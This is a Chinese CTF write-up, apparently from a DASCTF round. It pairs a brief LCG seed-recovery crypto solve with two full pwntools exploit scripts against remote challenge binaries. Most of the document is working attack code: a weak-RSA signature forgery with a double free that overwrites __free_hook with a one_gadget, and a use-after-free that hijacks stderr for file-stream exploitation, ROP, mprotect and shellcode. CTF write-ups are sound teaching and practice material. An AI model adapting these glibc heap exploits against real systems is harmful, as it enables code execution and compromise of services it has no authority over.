和强网杯撞了,浅浅做完了pwn,其他的也不大会。

最近有点摸 wp 没有仔细整理,如果发现我真的写的很潦草影响到阅读的话可以去 🐧 戳我。

crypto

lcg,直接网上找的脚本

crypto1

# https://blog.csdn.net/superprintf/article/details/108964563#t3
from libnum import *
from Crypto.Util.number import *
from gmpy2 import *
from sympy import *
from z3 import *
def _recover_lcg_seed(modulus, outputs):
    """Recover (a, b, seed) of x_{i+1} = a*x_i + b (mod modulus) from three consecutive outputs.

    With x1 = a*x0 + b and x2 = a*x1 + b, the multiplier is
    a = (x2 - x1) / (x1 - x0), the increment b = x1 - a*x0, and the seed
    x_{-1} = (x0 - b) / a -- all modular inverses are taken with invmod.
    Three outputs fully determine the generator, which is why an LCG must
    never be used where an unpredictable PRNG is required.
    """
    x0, x1, x2 = outputs
    mult = (x2 - x1) * invmod((x1 - x0), modulus)
    incr = (x1 - mult * x0) % modulus
    seed = (invmod(mult, modulus) * (x0 - incr)) % modulus
    return mult, incr, seed


# Challenge parameters: the modulus and three consecutive LCG outputs.
p = 31893593182018727625473530765941216190921866039118147474754069955393226712079257707838327486268599271803
s = [25820280412859586557218124484272275594433027771091486422152141535682739897353623931875432576083022273940,
     24295465524789348024814588142969609603624462580932512051939198335014954252359986260009296537423802567677,
     14963686422550871447791815183480974143372785034397446416396172429864269108509521776424254168481536292904]
a, b, seed = _recover_lcg_seed(p, s)
ani = invmod(a, p)
print(long_to_bytes(seed))

pwn

pwn1

二血题

难点在交互,解决了 RSA 之后就比较好做了,采取的是在处理函数内部下断点,dump 出 n 和 e 的思路。

漏洞点在 free 时没有清空 content 指针,可以河里堆风水进行 Double Free。

image-20220729192811416

最后拿的 Fastbin Reverse Into Tcache 打 one gadget ,顺利拿到了 shell。

#!/usr/bin/env python2
# -*- coding: utf-8 -*
import re
import os
from pwn import *
from LibcSearcher import *
from libnum import *

# Thin I/O wrappers around the global pwntools tube ``p`` (assigned further
# down, after ``remote(...)``); Python 2, so str and bytes are the same type.
def se(data):
    """Raw send."""
    return p.send(data)

def sa(delim, data):
    """Wait for ``delim``, then send ``data``."""
    return p.sendafter(delim, data)

def sl(data):
    """Send ``data`` followed by a newline."""
    return p.sendline(data)

def sla(delim, data):
    """Wait for ``delim``, then send ``data`` plus newline."""
    return p.sendlineafter(delim, data)

def sea(delim, data):
    """Alias of sa(): wait for ``delim``, then send ``data``."""
    return p.sendafter(delim, data)

def rc(numb=4096):
    """Receive up to ``numb`` bytes."""
    return p.recv(numb)

def ru(delims, drop=True):
    """Receive until ``delims``; the delimiter is dropped unless drop=False."""
    return p.recvuntil(delims, drop)

def uu32(data):
    """Unpack a <=4-byte little-endian value, NUL-padded on the right."""
    return u32(data.ljust(4, '\0'))

def uu64(data):
    """Unpack a <=8-byte little-endian value, NUL-padded on the right."""
    return u64(data.ljust(8, '\0'))

def lg(name, data):
    """Log ``name`` and an integer ``data`` in hex (cyan ANSI colour)."""
    return p.success(name + ': \033[1;36m 0x%x \033[0m' % data)

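def debug(breakpoint=''):
    """Attach gdb to the global process ``p`` (local runs only; see the
    commented-out ``p = process(...)`` line further down).

    Args:
        breakpoint: an int is treated as an offset into the binary and rebased
            on the executable's load address when the ELF is PIE; any other
            value is appended verbatim to the gdb script (default '' adds
            nothing).

    Raises:
        RuntimeError: if pmap reports no mapping for the process.
    """
    glibc_dir = '~/Exps/Glibc/glibc-2.27/'
    # Source directories so gdb can show glibc source while stepping the allocator.
    gdbscript = ''.join(
        'directory %s%s/\n' % (glibc_dir, sub)
        for sub in ('malloc', 'stdio-common', 'stdlib', 'libio', 'elf')
    )
    elf_base = 0
    if elf.pie:
        # pmap's first line is a header; line 1 is the first mapping, which is
        # taken as the load base. p.pid is an int, so the shell string is not
        # injectable; the pipe is closed deterministically via ``with``.
        with os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)) as maps:
            lines = maps.readlines()
        if len(lines) < 2:
            raise RuntimeError('pmap gave no mappings for pid %d' % p.pid)
        elf_base = int(lines[1], 16)
    if isinstance(breakpoint, int):
        gdbscript += 'b *{:#x}\n'.format(int(breakpoint) + elf_base)
    else:
        gdbscript += breakpoint
    gdb.attach(p, gdbscript)
    time.sleep(1)  # let the gdb pane come up before the script continues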

# Target setup for pwn1 (Python 2 / pwntools).
elf = ELF('./pwn')
context(arch = elf.arch, os = 'linux',log_level = 'debug',terminal = ['tmux', 'splitw', '-hp','62'])
# p = process('./pwn')
# debug()
p = remote('tcp.dasc.buuoj.cn',27495)
# RSA parameters of the service's request check (the writeup says n and e were
# dumped from the handler under gdb). P is a 24-bit factor, so N = P*Q factors
# trivially and the private exponent D can be derived below -- the defensive
# lesson being that a modulus with a small prime factor offers no protection.
P = 16617127
Q = 7578299081774973675168926220497127633745768478826174746554492422165802765780212810518589529228694315205511189705177457329278843566817056465274478392762585485827514172817826950842752547461016536920016232514874472692360067934908514830732106744500567245807025552586514363470336002166323093239378322678157
N = P*Q
PHI = (P-1)*(Q-1)
D = invmod(0x10001,PHI)  # private exponent for the public exponent e = 0x10001

def add(size=0x10,content='u'*0x10,tf='n',name='\0'*40):
    """Send an "add" request (opcode 0x101) carrying ``name`` (40 bytes by default).

    The request line is RSA-signed with the recovered private exponent D
    and left-padded with NULs to 0x100 bytes before being sent. When
    ``tf == 'y'`` a description of ``size`` bytes holding ``content`` is
    attached as well; otherwise the prompt is answered with 'n'.
    """
    request = str(0x101) + '\n' + name
    signed = n2s((pow(s2n(request), D, N)))
    lg('LEN', len(signed))
    sea('> ', str(signed).rjust(0x100, '\0'))
    with_desc = tf == 'y'
    sla('Want to add description?(y/n) ', 'y' if with_desc else 'n')
    if with_desc:
        sea('size: ', str(size))
        sea('content: ', str(content))

def dele(name):
    """Send a "delete" request (opcode 0x102) for the entry called ``name``.

    Like add(): the line is RSA-signed with D and NUL-padded to 0x100 bytes.
    """
    line = str(0x102) + '\n' + name
    blob = n2s((pow(s2n(line), D, N)))
    lg('LEN', len(blob))
    sea('> ', str(blob).rjust(0x100, '\0'))

def show():
    """Send a "show" request (opcode 0x105) with an empty (NUL) name.

    Like add(): the line is RSA-signed with D and NUL-padded to 0x100 bytes.
    """
    line = str(0x105) + '\n' + '\0'
    blob = n2s((pow(s2n(line), D, N)))
    lg('LEN', len(blob))
    sea('> ', str(blob).rjust(0x100, '\0'))

def edit(name,data):
    """Send an "edit" request (opcode 0x201): ``name`` and ``data`` joined by ';'.

    Like add(): the line is RSA-signed with D and NUL-padded to 0x100 bytes.
    """
    line = str(0x201) + '\n' + name + ';' + data
    blob = n2s((pow(s2n(line), D, N)))
    lg('LEN', len(blob))
    sea('> ', str(blob).rjust(0x100, '\0'))

# Exploit sequence for pwn1 (Python 2 / pwntools). Every request is RSA-signed
# with D inside add/dele/show/edit. The add/dele ordering below is a heap
# layout the author tuned under gdb and is order-dependent.
# NOTE(review): this msg is never sent -- each helper rebuilds its own (dead code).
msg = str(0x101) + '\n' + '\0'
msg = n2s((pow(s2n(msg),D,N)))
# Leftover gdb expressions from the debugging session.
# msg = pack(msg)
# msg = cyclic(0x100)
# x/20xg $rebase(0x206090)
# x/20xg $rebase(0x206140)
# tel 0x7fffffffdd10 20
# add(0x10,name='AB1')
# x/20xg $rebase(0x2060A0)
# Names are five 8-byte fields (40 bytes, add()'s default name length).
add(0x450,tf='y',content='u',name='FK1'.ljust(8,'\0')+'NM1'.ljust(8,'\0')+'ND1'.ljust(8,'\0')+'\x01'.ljust(8,'\0')+'\x02'.ljust(8,'\0'))
add(0x10,name='FK2'.ljust(8,'\0')+'NM2'.ljust(8,'\0')+'ND2'.ljust(8,'\0')+'\x03'.ljust(8,'\0')+'\x04'.ljust(8,'\0'))


dele('FK1')
add(0x420,tf='y',content='u',name='FK1'.ljust(8,'\0')+'NM1'.ljust(8,'\0')+'ND1'.ljust(8,'\0')+'\x01'.ljust(8,'\0')+'\x02'.ljust(8,'\0'))

# Leak 1: show() echoes the entry; the 6 bytes ending in '\x7f' are read as a
# libc pointer. 0x3ec075 is an offset into the remote libc build (debug()
# points gdb at glibc-2.27 sources, so presumably that version) -- it and
# every libc/heap offset below are build-specific.
show()
libc_leak = uu64(ru('\x7f',drop=False)[-6:])
libc_base = libc_leak - 0x3ec075
lg('libc_leak',libc_leak)
lg('libc_base',libc_base)
#libc = ELF('./libc.so.6')
libc = elf.libc  # pwntools' local libc guess; symbols only hold if it matches the remote build
libc.address = libc_base
system_addr = libc.sym.system  # NOTE(review): unused below
bin_sh = libc.search('/bin/sh').next()  # Python 2 iterator API; unused below
magic = libc.sym.setcontext + 61  # unused below
# Leak 2: after re-adding, show() echoes 0x10 'u's and the next 6 bytes are
# read as a heap pointer; 0x330 is the author's measured offset to the heap start.
dele('FK1')
add(0x420,tf='y',content='u'*0x10,name='FK1'.ljust(8,'\0')+'NM1'.ljust(8,'\0')+'ND1'.ljust(8,'\0')+'\x01'.ljust(8,'\0')+'\x02'.ljust(8,'\0'))
show()
ru('u'*0x10)
heap_leak = uu64(rc(6))
heap_base = heap_leak - 0x330
lg('heap_leak',heap_leak)
lg('heap_base',heap_base)

# Heap layout preparation (see the writeup text above for the technique).
add(0x50,tf='y',content='u'*0x10,name='AB0'.ljust(8,'\0')+'NM3'.ljust(8,'\0')+'ND3'.ljust(8,'\0')+'\x05'.ljust(8,'\0')+'\x06'.ljust(8,'\0'))
add(0x70,tf='y',content='u'*0x10,name='AB1'.ljust(8,'\0')+'NM4'.ljust(8,'\0')+'ND43'.ljust(8,'\0')+'\x07'.ljust(8,'\0')+'\x08'.ljust(8,'\0'))
dele('AB0')
dele('AB1')
add(0x50,tf='y',content='u'*0x10,name='AB3'.ljust(8,'\0')+'NM5'.ljust(8,'\0')+'ND5'.ljust(8,'\0')+'\x09'.ljust(8,'\0')+'\x0a'.ljust(8,'\0'))
add(0x20,tf='n',content='u'*0x10,name='AB0'.ljust(8,'\0')+'NM3'.ljust(8,'\0')+'ND3'.ljust(8,'\0')+'\x05'.ljust(8,'\0')+'\x06'.ljust(8,'\0'))
# for i in range(3):
# Seven same-sized entries ZZ0..ZZ6 (the loop was unrolled by hand).
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(0)).ljust(8,'\0')+('XX{}'.format(0)).ljust(8,'\0')+('CW{}'.format(0)).ljust(8,'\0')+str(p8((0))).ljust(8,'\0')+p8(1).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(1)).ljust(8,'\0')+('XX{}'.format(1)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((2))).ljust(8,'\0')+p8(3).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(2)).ljust(8,'\0')+('XX{}'.format(2)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((4))).ljust(8,'\0')+p8(5).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(3)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((6))).ljust(8,'\0')+p8(7).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(4)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((8))).ljust(8,'\0')+p8(9).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(5)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((10))).ljust(8,'\0')+p8(11).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(6)).ljust(8,'\0')+('XX{}'.format(5)).ljust(8,'\0')+('CW{}'.format(6)).ljust(8,'\0')+str(p8((7))).ljust(8,'\0')+p8(12).ljust(8,'\0'))
# pause()
# NOTE(review): the fourth field here is padded to 4 bytes, not 8, unlike the ZZ entries.
add(0x50,tf='y',content='u'*0x10,name=('CC{}'.format(0)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(6)).ljust(8,'\0')+str(p8((9))).ljust(4,'\0')+p8(13).ljust(8,'\0'))
# add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(7)).ljust(8,'\0')+('XX{}'.format(5)).ljust(8,'\0')+('CW{}'.format(6)).ljust(8,'\0')+str(p8((5))).ljust(8,'\0')+p8(11).ljust(8,'\0'))
# for i in range(7-1-i):
# dele('ZZ{}'.format(i))

# Free ZZ6..ZZ0 in reverse order, then AB0, CC0, AB3.
dele('ZZ{}'.format(6))
dele('ZZ{}'.format(5))
dele('ZZ{}'.format(4))
dele('ZZ{}'.format(3))
dele('ZZ{}'.format(2))
dele('ZZ{}'.format(1))
dele('ZZ{}'.format(0))

dele('AB{}'.format(0))
dele('CC{}'.format(0))
dele('AB{}'.format(3))

# Re-add the same entries; ZZ6 now carries '/bin/sh\0' and CC0 carries the
# address of __free_hook as its content (see the writeup text above).
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(0)).ljust(8,'\0')+('XX{}'.format(0)).ljust(8,'\0')+('CW{}'.format(0)).ljust(8,'\0')+str(p8((0))).ljust(8,'\0')+p8(1).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(1)).ljust(8,'\0')+('XX{}'.format(1)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((2))).ljust(8,'\0')+p8(3).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(2)).ljust(8,'\0')+('XX{}'.format(2)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((4))).ljust(8,'\0')+p8(5).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(3)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((6))).ljust(8,'\0')+p8(7).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(4)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((8))).ljust(8,'\0')+p8(9).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('ZZ{}'.format(5)).ljust(8,'\0')+('XX{}'.format(3)).ljust(8,'\0')+('CW{}'.format(1)).ljust(8,'\0')+str(p8((10))).ljust(8,'\0')+p8(11).ljust(8,'\0'))
add(0x50,tf='y',content='/bin/sh\0',name=('ZZ{}'.format(6)).ljust(8,'\0')+('XX{}'.format(5)).ljust(8,'\0')+('CW{}'.format(6)).ljust(8,'\0')+str(p8((7))).ljust(8,'\0')+p8(12).ljust(8,'\0'))

add(0x50,tf='y',content=p64(libc.sym.__free_hook),name=('CC{}'.format(0)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(6)).ljust(8,'\0')+str(p8((9))).ljust(4,'\0')+p8(13).ljust(8,'\0'))
# add(0x50,tf='y',content='u'*0x10,name=('CC{}'.format(0)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(6)).ljust(8,'\0')+str(p8((9))).ljust(4,'\0')+p8(13).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('FF{}'.format(2)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(6)).ljust(8,'\0')+str(p8((1))).ljust(4,'\0')+p8(13).ljust(8,'\0'))
add(0x50,tf='y',content='u'*0x10,name=('FF{}'.format(3)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(6)).ljust(8,'\0')+str(p8((2))).ljust(4,'\0')+p8(3).ljust(8,'\0'))
# one_gadget output for the remote libc build, kept verbatim and parsed below
# so the full candidate list (and each gadget's constraints) stays visible.
og = '''
0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL

0x4f302 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL

0xe534f execve("/bin/sh", r13, rbx)
constraints:
[r13] == NULL || r13 == NULL
[rbx] == NULL || rbx == NULL

0xe54f7 execve("/bin/sh", [rbp-0x88], [rbp-0x70])
constraints:
[[rbp-0x88]] == NULL || [rbp-0x88] == NULL
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL

0xe54fe execve("/bin/sh", rcx, [rbp-0x70])
constraints:
[rcx] == NULL || rcx == NULL
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL

0xe5502 execve("/bin/sh", rcx, rdx)
constraints:
[rcx] == NULL || rcx == NULL
[rdx] == NULL || rdx == NULL

0x10a2fc execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL

0x10a308 execve("/bin/sh", rsi, [rax])
constraints:
[rsi] == NULL || rsi == NULL
[[rax]] == NULL || [rax] == NULL
'''
# Offsets rebased on libc_base, execve matches first, then posix_spawn matches
# (none exist in this og text, so the second scan contributes nothing).
ones = [
    libc_base + int(off, 16)
    for off in re.findall(r'\n(.+?) execve', og) + re.findall(r'\n(.+?) posix_spawn', og)
]
for idx, addr in enumerate(ones):
    lg('ONES[%d]' % idx, addr)
# add(0x50,tf='y',content='u'*0x10,name=('CC{}'.format(1)).ljust(8,'\0')+('SW{}'.format(2)).ljust(8,'\0')+('AD{}'.format(2)).ljust(8,'\0')+str(p8((3))).ljust(4,'\0')+p8(13).ljust(8,'\0'))
# Final add: the entry's content is ones[1], i.e. libc_base + 0x4f302 from the
# one_gadget list above (the author picked the second candidate).
add(0x50,tf='y',content=p64(ones[1]),name=('FF{}'.format(4)).ljust(8,'\0')+('SW{}'.format(8)).ljust(8,'\0')+('AD{}'.format(8)).ljust(8,'\0')+str(p8((9))).ljust(4,'\0')+p8(3).ljust(8,'\0'))




# add(0x100,tf='y',content='u'*0x10,name='FK3'.ljust(8,'\0')+'NM3'.ljust(8,'\0')+'ND3'.ljust(8,'\0')+'\x05'.ljust(8,'\0')+'\x06'.ljust(8,'\0'))

p.interactive()  # hand the connection over to the terminal

pwn2

一血题

这题的漏洞也很直接,就是一个 UAF,关键在堆风水和利用。

image-20220731231941452

但是每次 calloc 会清空堆块内容,leak libc 只能依赖 free 时的内容显示。

image-20220731232057742

后门函数,一次写固定值,一次任意写。

image-20220731232342257

具体思路

  1. 利用 UAF 构造 fastbin double free,leak 堆地址的同时去构造堆块重叠
  2. 分割 Largebin 至 tcache 范围内,避免再次 free 报错,利用 Offer by one 这个一次性函数填补 \x00 后 free,leak 出libc。
  3. 这样我们很轻易的可以控制 servant,进入后门函数
  4. 后门函数我采取的思路是不管固定值的这个,劫持 stderr 为堆地址,perror 进入 __fxprintf 触发 IO 流
  5. IO 流构造比较复杂,也是采取的调试改风水的思路,控制 _wide_data 结构体,setcontext 配合 gets 完成 shellcode 利用
  6. 详见 exp

Exp

#!/usr/bin/env python2
# -*- coding: utf-8 -*
import re
import os
from pwn import *
from LibcSearcher import *

# Thin I/O wrappers around the global pwntools tube ``p`` (assigned further
# down, after ``remote(...)``); Python 2, so str and bytes are the same type.
def se(data):
    """Raw send."""
    return p.send(data)

def sa(delim, data):
    """Wait for ``delim``, then send ``data``."""
    return p.sendafter(delim, data)

def sl(data):
    """Send ``data`` followed by a newline."""
    return p.sendline(data)

def sla(delim, data):
    """Wait for ``delim``, then send ``data`` plus newline."""
    return p.sendlineafter(delim, data)

def sea(delim, data):
    """Alias of sa(): wait for ``delim``, then send ``data``."""
    return p.sendafter(delim, data)

def rc(numb=4096):
    """Receive up to ``numb`` bytes."""
    return p.recv(numb)

def ru(delims, drop=True):
    """Receive until ``delims``; the delimiter is dropped unless drop=False."""
    return p.recvuntil(delims, drop)

def uu32(data):
    """Unpack a <=4-byte little-endian value, NUL-padded on the right."""
    return u32(data.ljust(4, '\0'))

def uu64(data):
    """Unpack a <=8-byte little-endian value, NUL-padded on the right."""
    return u64(data.ljust(8, '\0'))

def lg(name, data):
    """Log ``name`` and an integer ``data`` in hex (cyan ANSI colour)."""
    return p.success(name + ': \033[1;36m 0x%x \033[0m' % data)

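def debug(breakpoint=''):
    """Attach gdb to the global process ``p`` (local runs only; see the
    commented-out ``p = process(...)`` line further down).

    Besides the optional caller breakpoint, a breakpoint on
    ``_IO_wdoallocbuf`` is always set (the stdio path this exploit walks).

    Args:
        breakpoint: an int is treated as an offset into the binary and rebased
            on the executable's load address when the ELF is PIE; any other
            value is appended verbatim to the gdb script (default '' adds
            nothing).

    Raises:
        RuntimeError: if pmap reports no mapping for the process.
    """
    glibc_dir = '~/Exps/Glibc/glibc-2.32/'
    # Source directories so gdb can show glibc source while stepping the allocator.
    gdbscript = ''.join(
        'directory %s%s/\n' % (glibc_dir, sub)
        for sub in ('malloc', 'stdio-common', 'stdlib', 'libio', 'elf')
    )
    elf_base = 0
    if elf.pie:
        # pmap's first line is a header; line 1 is the first mapping, which is
        # taken as the load base. p.pid is an int, so the shell string is not
        # injectable; the pipe is closed deterministically via ``with``.
        with os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)) as maps:
            lines = maps.readlines()
        if len(lines) < 2:
            raise RuntimeError('pmap gave no mappings for pid %d' % p.pid)
        elf_base = int(lines[1], 16)
    if isinstance(breakpoint, int):
        gdbscript += 'b *{:#x}\n'.format(int(breakpoint) + elf_base)
    else:
        gdbscript += breakpoint
    gdbscript += 'b *_IO_wdoallocbuf\n'
    gdb.attach(p, gdbscript)
    time.sleep(1)  # let the gdb pane come up before the script continues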

# Target setup for pwn2 (Python 2 / pwntools).
elf = ELF('./pwn2')
context(arch = elf.arch, os = 'linux',log_level = 'debug',terminal = ['tmux', 'splitw', '-hp','62'])
# p = process('./pwn2')
# debug()
p = remote('tcp.dasc.buuoj.cn',23606)

# The program asks for a player name before showing its menu.
sla("Your name: ",'u')

def menu(c):
    """Answer the '>> ' menu prompt with choice ``c`` (converted to str)."""
    choice = str(c)
    sla('>> ', choice)

def mage(trick):
    """Menu option 1: create a Mage whose trick text is ``trick``."""
    menu('1')
    trick_text = str(trick)
    sla("What's your trick?", trick_text)

def servant(id,name,info):
    """Menu option 2: recruit a Servant (``name``, ``info``) for Mage ``id``."""
    menu('2')
    answers = (
        ("Recruit Servant for which Mage?", id),
        ("Servant name: ", name),
        ("Servant info: ", info),
    )
    for prompt, value in answers:
        sla(prompt, str(value))

def dele(id,magic='n'):
    """Menu option 3: expel Mage ``id`` and answer the 'Offer by one?' prompt with ``magic``."""
    menu('3')
    sla('Which Mage?', str(id))
    sla('Offer by one?', magic)

def delete(id):
    """Menu option 3 without answering the 'Offer by one?' prompt.

    Unlike dele(), nothing is sent after the Mage id; presumably the prompt
    is not shown for these ids, or the caller's next send consumes it.
    """
    menu('3')
    which = str(id)
    sla('Which Mage?', which)

def attack(mage='n',id='0',chr='u'):
    """Menu option 4: attack, optionally selecting Mage ``id`` when ``mage == 'y'``.

    ``chr`` is accepted for call-compatibility but never used.
    """
    menu('4')
    sla("Would you like to select a Mage to attack ?", mage)
    if mage != 'y':
        return
    sla("Which Mage ?", str(id))


# Exploit sequence for pwn2 (Python 2 / pwntools). mage/servant/attack/dele
# map to the program's menu; the ordering was tuned under gdb and is
# order-dependent. The trailing "# 0xNN" comments are the author's Mage indices.
mage("fuck0".ljust(0x18,'\0')+p64(0x51)+'\0'*8)
servant(0,'nmsl','wsnd')
for i in range(1,0x11):
    mage("fuck{}".format(i))

for i in range(7):
    attack('y',10-1-i)

attack('y','1')
dele(2)
dele(1)
# Heap leak: the expel message echoes the freed chunk's first 5 bytes. The
# `<< 12` here and the xor two lines below are consistent with safe-linking
# pointer mangling (glibc >= 2.32; debug() points gdb at 2.32 sources) --
# presumably, confirm against the target libc.
ru('Expel Mage, whose trick is: ')
heap_leak = uu64(rc(5))
heap_base = heap_leak << 12
lg('heap_leak',heap_leak)
lg('heap_base',heap_base)

mage(p64(heap_leak^(heap_base+0x2b0))) # 0x11
mage('fuckx12') # 0x12
mage('fuckx13') # 0x13

dele(0)
mage("fuckx14".ljust(0x18,'\0')+p64(0x51)+p64(heap_leak)) # 0x14


# Same as mage(), but sent with sea() instead of sla() (no trailing newline).
menu('1')
sea("What's your trick?",str('\x01'*0x28+p32(0x21)+'\0'*3)) # 0x15

# attack('n','1')
dele(0x14)
mage("fuckx16".ljust(0x18,'\0')+p64(0x461)+p64(heap_leak)) # 0x16
# attack('y',0xf)

dele(0x15)

mage("fuckx17".ljust(8,'\0')+p32(0x7fffff01)+p32(0x123456)+p64(heap_base+0x2c0)) # 0x17

# libc leak via the 'Offer by one?' path (dele(..., 'y')); 0x1e0c0a and the
# _IO_wfile_jumps / stderr offsets below are specific to the remote libc build.
dele(0x1,'y')
libc_leak = uu64(ru('\x7f',drop=False)[-6:])
libc_base = libc_leak - 0x1e0c0a
lg('libc_leak',libc_leak)
lg('libc_base',libc_base)
#libc = ELF('./libc.so.6')
libc = elf.libc  # pwntools' local libc guess; symbols only hold if it matches the remote build
libc.address = libc_base
system_addr = libc.sym.system  # NOTE(review): unused below
bin_sh = libc.search('/bin/sh').next()  # Python 2 iterator API; unused below
magic = libc.sym.setcontext + 61
_IO_wfile_jumps = libc_base + 0x1e1f60
stderr = libc_base + 0x1e17a0  # plain int: libc address of the stderr FILE, by fixed offset
# x/20xg 0x555555606600
delete(0xa)
mage(("fuckx18\0"+p64(heap_base+0x200)).ljust(0x20,'\0')+p64(heap_base+0x690)) # 0x18
delete(0xb)
mage(p64(0)+p64(_IO_wfile_jumps-0x20)) # 0x19
# ROP gadget offsets; see the gadget dump in the string literal at the end of the file.
rdi = 0x0000000000028a55 + libc_base
ret = 0x0000000000026699 + libc_base
rsi = 0x000000000002a4cf + libc_base
rdx = 0x00000000000c7f32 + libc_base
delete(0xd)
mage(p64(rdi)+p64(heap_base+0x6d0)+p64(libc.sym.gets)) # 0x19


delete(0xe)
mage(p64(0)+p64(libc.sym.gets)+p64(heap_base+0x6d0)+p64(ret)) # 0x19
delete(0xf)
mage(p64(heap_base+0x778-0x68)+p64(magic)) # 0x19

# Backdoor (menu option 4): two writes, the second one being the arbitrary
# write described in the writeup; it is pointed at stderr here.
menu('4')
sea('LEAVE MY NAME: ',p64(heap_base+0x100))
sea('WRITE YOUR NAME: ',p64(stderr))
# pause()
se(p64(heap_base+0x600-0xa0))

# Final input: rop chain (mprotect on the heap, then shellcode) delivered via
# gets() per the writeup; sleep(3) is the author's delay before sending it.
rop_chain = p64(heap_base+0x300)
rop_chain += 'u'*0x10
rop_chain += p64(rdi) + p64(heap_base) + p64(rsi) + p64(0x2000) + p64(rdx) + p64(7) + p64(libc.sym.mprotect) + p64(heap_base+0x728)
rop_chain += asm(shellcraft.cat('/flag')+shellcraft.exit(0))
sleep(3)
sl(rop_chain)
# The string literal below is a gdb trace and gadget dump kept as notes; it is
# a bare expression statement and has no runtime effect.
'''
0x7ffff7e30d91 <perror_internal+81> lea rsi, [rip + 0x14f54f]
0x7ffff7e30d98 <perror_internal+88> xor eax, eax
► 0x7ffff7e30d9a <perror_internal+90> call __fxprintf <__fxprintf>
rdi: 0x555555606560 ◂— 0x0
rsi: 0x7ffff7f802e7 ◂— 0xa732573257325 /* '%s%s%s\n' */


0x7ffff7e453f6 <__vfprintf_internal+262> mov rsi, qword ptr [rsp + 8]
0x7ffff7e453fb <__vfprintf_internal+267> mov rdx, rbx
0x7ffff7e453fe <__vfprintf_internal+270> mov rdi, rbp
► 0x7ffff7e45401 <__vfprintf_internal+273> call qword ptr [r12 + 0x38] <_IO_wfile_xsputn>
rdi: 0x555555606560 ◂— 0x0
rsi: 0x7ffff7f802e7 ◂— 0xa732573257325 /* '%s%s%s\n' */
rdx: 0x0
rcx: 0xd68
0x7ffff7e54a52 <_IO_wdoallocbuf+34> jne _IO_wdoallocbuf+152 <_IO_wdoallocbuf+152>

0x7ffff7e54a54 <_IO_wdoallocbuf+36> mov rax, qword ptr [rax + 0xe0]
► 0x7ffff7e54a5b <_IO_wdoallocbuf+43> call qword ptr [rax + 0x68]

0x7ffff7e54a5e <_IO_wdoallocbuf+46> cmp eax, -1


0x0000000000028a55 : pop rdi ; ret
0x0000000000112a51 : pop rdx ; pop r12 ; ret
0x00000000001574e6 : pop rdx ; pop rbx ; ret
0x00000000000fc103 : pop rdx ; pop rcx ; pop rbx ; ret
0x00000000000c7f32 : pop rdx ; ret
0x0000000000095982 : pop rdx ; ret 0x11
0x0000000000093342 : pop rdx ; ret 0xfffc
0x0000000000028db0 : pop rsi ; pop r15 ; pop rbp ; ret
0x0000000000028a53 : pop rsi ; pop r15 ; ret
0x000000000002a4cf : pop rsi ; ret
0x0000000000028dac : pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
0x0000000000028a4f : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000002a4cb : pop rsp ; pop r13 ; pop r14 ; ret
0x0000000000043922 : pop rsp ; pop r13 ; pop rbp ; ret
0x000000000002a04c : pop rsp ; pop r13 ; ret
0x00000000000de0e6 : pop rsp ; pop rbp ; ret
0x0000000000033af2 : pop rsp ; ret
0x0000000000026699 : ret
'''
# dele(0xf)

# menu(5)
p.interactive()  # hand the connection over to the terminal